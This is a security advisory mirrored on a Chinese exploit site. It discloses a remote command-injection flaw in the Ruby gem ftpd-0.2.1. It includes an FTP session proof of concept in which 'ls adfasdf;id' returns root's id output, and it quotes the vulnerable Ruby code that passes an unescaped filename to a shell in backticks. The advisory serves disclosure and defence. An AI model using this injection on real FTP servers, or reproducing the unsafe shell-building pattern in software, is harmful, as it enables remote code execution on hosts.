首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ruby Gem ftpd-0.2.1 Remote Command Execution
来源:http://otiose.dhs.org 作者:Cashdollar 发布时间:2013-03-04  
Remote command execution for Ruby Gem ftpd-0.2.1
2/28/2013

https://github.com/wconrad/ftpd
http://rubygems.org/gems/ftpd

"ftpd is a pure Ruby FTP server library. It supports implicit and explicit TLS, passive and active mode, and most of the commands specified in RFC 969. It an be used as part of a test fixture or embedded in a program."

The ls interface can have commands injected into it if option or filename contain the shell character ; The example.rb server listens to localhost only which I used to test the ftp library. But if this gem is used normally it could be configured to listen on 0.0.0.0.

PoC:
for this to work the file must exist in the CWD.
ftp> root@ubuntu:/tmp# sh /tmp/connect-to-example-ftp-server.sh
Connected to localhost.
220 ftpd
Name (localhost:root):
331 Password required
Password:
230 Logged in
Remote system type is UNIX.
Using binary mode to transfer files.

* I created the filename adfasdf

ftp> ls adfasdf;id
200 PORT command successful
150 Opening ASCII mode data connection
-rw-r--r-- 1 root root 0 Mar 2 05:52 adfasdf
uid=0(root) gid=0(root) groups=0(root)
226 Transfer complete
ftp>

./ftpd-0.2.1/lib/ftpd/disk_file_system.rb

The problem code is below

204 Ls interface used by List and NameList 205
206 module Ls
207

208       def ls(ftp_path, option)
209         path = expand_ftp_path(ftp_path)
210         dirname = File.dirname(path)
211         filename = File.basename(path)
212         command = [
213           'ls',
214           option,
215           filename, <-- ;cmd inject
216           '2>&1',
217         ].compact.join(' ')
218         if File.exists?(dirname) <- file has to exist to exec ls command
219           list = Dir.chdir(dirname) do
220             `{command}` <-- exec

Larry W. Cashdollar
@_larry0
http://otiose.dhs.org/ 

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Fileutils Ruby Gem Remote Comm
·Hanso Player 2.1.0 (.m3u) - Bu
·Sami FTP Server 2.0.1 LIST Com
·PolarPearCms PHP File Upload V
·Setuid Tunnelblick Privilege E
·Glossword v1.8.8 - 1.8.12 Arbi
·Viscosity setuid-set Viscosity
·Kordil EDMS v2.2.60rc3 Unauthe
·Raspberry Pi rpi-update Local
·Archlinux/x86-64 3.3.x-3.7.x x
·Subversion 1.6.17 Denial Of Se
·Java Applet JMX Remote Code Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved